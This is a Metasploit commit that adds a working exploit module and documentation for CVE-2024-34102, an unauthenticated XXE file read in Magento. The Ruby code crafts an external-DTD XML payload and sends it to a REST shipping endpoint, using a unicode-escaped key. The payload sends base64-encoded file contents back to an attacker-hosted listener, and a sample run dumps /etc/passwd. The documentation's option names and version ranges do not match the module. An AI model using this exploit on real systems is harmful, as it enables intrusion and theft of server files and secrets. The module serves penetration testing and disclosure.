Land rapid7#19304, Add Magento XXE File Read Exploit

jheysel-r7 · jheysel-r7 · commit 6ad5ba36fd48 · 2024-07-18T10:32:03.000-07:00
This adds an auxiliary module for an XXE which results in an arbirary file in Magento which is being tracked as CVE-2024-34102
diff --git a/documentation/modules/auxiliary/gather/magento_xxe_cve_2024_34102.md b/documentation/modules/auxiliary/gather/magento_xxe_cve_2024_34102.md
@@ -0,0 +1,159 @@
+## Vulnerable Application
+
+### Description
+
+An unauthenticated user can read arbritraty file from Magento Community edition version 2.4.0 to 2.4.3.
+The vulnerability is due to the lack of input validation in the XML file. An attacker can exploit this
+vulnerability by sending a specially crafted XML file to the target server. The attacker can read any file on the server.
+
+On June 27, 2024, Adobe released a software update that addressed this vulnerability (CVE-2024-34102).
+
+The following products are affected:
+
+- Adobe Commerce: versions before:      2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8; 2.4.3-ext-7 ; 2.4.2-ext-7
+- Magento Open Source: versions before: 2.4.7; 2.4.6-p5; 2.4.5-p7; 2.4.4-p8
+- Adobe Commerce Webhooks Plugin: versions 1.2.0 to 1.4.0
+
+### Exploitation
+
+This module exploits the XXE vulnerability in Magento by following these steps:
+
+- Creating a DTD File: This file includes entities that will read and encode `FILE`, then send it to your endpoint.
+
+- Host the DTD File: Serve the dtd.xml file, accessible via HTTP `SRVHOST` on port `SRVPORT`.
+
+- Craft the HTTP Request: Craft the XML payload which will include the DTD file hosted on your server.
+
+- Execute a HTTP Request: Send the crafted XML payload to the target server.
+
+- Capture the Exfiltrated Data: The exfiltrated data will be sent back to the attacker in a HTTP GET request and them saved in the loot.
+
+
+
+### Setup
+
+Create a `docker-compose.yml` file as below:
+
+```yml
+version: '2'
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+    volumes:
+      - 'mariadb_data:/bitnami/mariadb'
+  magento:
+    image: docker.io/bitnami/magento:2
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'magento_data:/bitnami/magento'
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7
+    volumes:
+      - 'elasticsearch_data:/bitnami/elasticsearch/data'
+volumes:
+  mariadb_data:
+    driver: local
+  magento_data:
+    driver: local
+  elasticsearch_data:
+    driver: local
+```
+
+Run the below command to create the container:
+
+```
+$ docker-compose up
+```
+
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Magento (Default: `/`).
+
+### SRVHOST (required)
+
+The local IP address to listen on. This must be a routable IP address on the local machine (0.0.0.0 is invalid). 
+
+### SRVPORT (required)
+
+The local port to listen on.
+
+## Scenarios
+
+### Docker container running Magento Community edition version 2.4
+
+```
+Module options (exploit/multi/http/magento_xxe_cve_2024_34102):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   FILE       /etc/passwd      yes       The file to read
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SRVHOST    192.168.128.1    yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to the web application
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST      localhost        no        HTTP server virtual host
+```
+
+```   
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Using URL: http://192.168.128.1:8080/
+[*] Sending XXE request
+[*] Received request for DTD file from 192.168.144.4
+[+] Received file /etc/passwd content
+[+] File saved in: /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+[*] exec: cat /home/redwaysecurity/.msf4/loot/20240715171929_default_127.0.0.1_etcpasswd_069426.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+msf6 exploit(multi/http/magento_xxe_cve_2024_34102) > 
+```
diff --git a/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb b/modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
@@ -0,0 +1,208 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  prepend Msf::Exploit::Remote::AutoCheck
+  CheckCode = Exploit::CheckCode
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Magento XXE Unserialize Arbitrary File Read',
+        'Description' => %q{
+          This module exploits a XXE vulnerability in Magento 2.4.7-p1 and below which allows an attacker to read any file on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Sergey Temnikov',  # Vulnerability discovery
+          'Heyder',           # Metasploit module
+        ],
+
+        'References' => [
+          ['CVE', '2024-34102'],
+          ['URL', 'https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md']
+        ],
+        'DisclosureDate' => '2024-06-11',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+      )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The base path to the web application', '/']),
+        OptString.new('TARGETFILE', [ true, 'The target file to read', '/etc/passwd']),
+        OptBool.new('STORE_LOOT', [true, 'Store the target file as loot', false])
+      ]
+    )
+  end
+
+  def check
+    vprint_status('Trying to get the Magento version')
+
+    # request to check if the target is vulnerable /magento_version
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/magento_version')
+    })
+
+    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200
+
+    # Magento/2.4 (Community)
+    version, edition = res.body.scan(%r{Magento/([\d.]+) \(([^)]+)\)}).first
+
+    version = Rex::Version.new(version)
+
+    return CheckCode::Safe("Detected Magento #{edition} edition version #{version} which is not vulnerable") unless
+      version <= (Rex::Version.new('2.4.7')) ||
+      version <= (Rex::Version.new('2.4.6-p5')) ||
+      version <= (Rex::Version.new('2.4.5-p7')) ||
+      version <= (Rex::Version.new('2.4.4-p8')) ||
+      (
+        edition == 'Enterprise' && (
+          version <= (Rex::Version.new('2.4.3-ext-7')) ||
+          version <= (Rex::Version.new('2.4.2-ext-7'))
+        )
+      )
+
+    CheckCode::Appears("Detected Magento #{edition} edition version #{version} which is vulnerable")
+  end
+
+  def ent_eval
+    @ent_eval ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def leak_param_name
+    @leak_param_name ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def dtd_param_name
+    @dtd_param_name ||= Rex::Text.rand_text_alpha_lower(4..8)
+  end
+
+  def make_xxe_dtd
+    filter_path = "php://filter/convert.base64-encode/resource=#{datastore['TARGETFILE']}"
+    ent_file = Rex::Text.rand_text_alpha_lower(4..8)
+    %(
+      <!ENTITY % #{ent_file} SYSTEM "#{filter_path}">
+      <!ENTITY % #{dtd_param_name} "<!ENTITY #{ent_eval} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/?#{leak_param_name}=%#{ent_file};'>">
+    )
+  end
+
+  def xxe_xml_data
+    param_entity_name = Rex::Text.rand_text_alpha_lower(4..8)
+
+    xml = "<?xml version='1.0' ?>"
+    xml += "<!DOCTYPE #{Rex::Text.rand_text_alpha_lower(4..8)}"
+    xml += '['
+    xml += "  <!ELEMENT #{Rex::Text.rand_text_alpha_lower(4..8)} ANY >"
+    xml += "    <!ENTITY % #{param_entity_name} SYSTEM 'http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha_lower(4..8)}.dtd'> %#{param_entity_name}; %#{dtd_param_name}; "
+    xml += ']'
+    xml += "> <r>&#{ent_eval};</r>"
+
+    xml
+  end
+
+  def xxe_request
+    vprint_status('Sending XXE request')
+
+    signature = Rex::Text.rand_text_alpha(6).capitalize
+
+    post_data = <<~EOF
+      {
+        "address": {
+        "#{signature}": "#{Rex::Text.rand_text_alpha_lower(4..8)}",
+        "totalsCollector": {
+          "collectorList": {
+          "totalCollector": {
+            "\u0073\u006F\u0075\u0072\u0063\u0065\u0044\u0061\u0074\u0061": {
+            "data": "#{xxe_xml_data}",
+            "options": 12345678
+            }
+          }
+          }
+        }
+        }
+      }
+    EOF
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/rest/V1/guest-carts/1/estimate-shipping-methods'),
+      'ctype' => 'application/json',
+      'data' => post_data
+    })
+
+    fail_with(Failure::UnexpectedReply, "Server returned unexpected response: #{res.code}") unless res&.code == 400
+
+    body = res.get_json_document
+
+    fail_with(Failure::UnexpectedReply, 'Server might not be vulnerable') unless body['parameters']['fieldName'] == signature
+  end
+
+  def run
+    if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
+      fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful')
+    end
+
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => '/'
+      }
+    })
+    datastore['SSL'] = true if ssl_restore
+    xxe_request
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  end
+
+  def on_request_uri(cli, req)
+    super
+    data = ''
+
+    case req.uri
+    when /(.*).dtd/
+      vprint_status("Received request for DTD file from #{cli.peerhost}")
+      data = make_xxe_dtd
+    when /#{leak_param_name}/
+      data = req.uri_parts['QueryString'].values.first.gsub(/\s/, '+')
+      if data&.empty?
+        print_error('No data received')
+      else
+
+        file_name = datastore['TARGETFILE']
+        file_data = ::Base64.decode64(data).force_encoding('UTF-8')
+
+        if datastore['STORE_LOOT']
+          p = store_loot(File.basename(file_name), 'text/plain', datastore['RHOST'], file_data, file_name, 'Magento XXE CVE-2024-34102 Results')
+          print_good("File saved in: #{p}")
+        else
+          # A new line is sent before file contents for better readability
+          print_good("File read succeeded! \n#{file_data}")
+        end
+
+      end
+    else
+      print_status("Unexpected request received: '#{req.method} #{req.uri}'")
+    end
+
+    send_response(cli, data)
+  end
+
+end
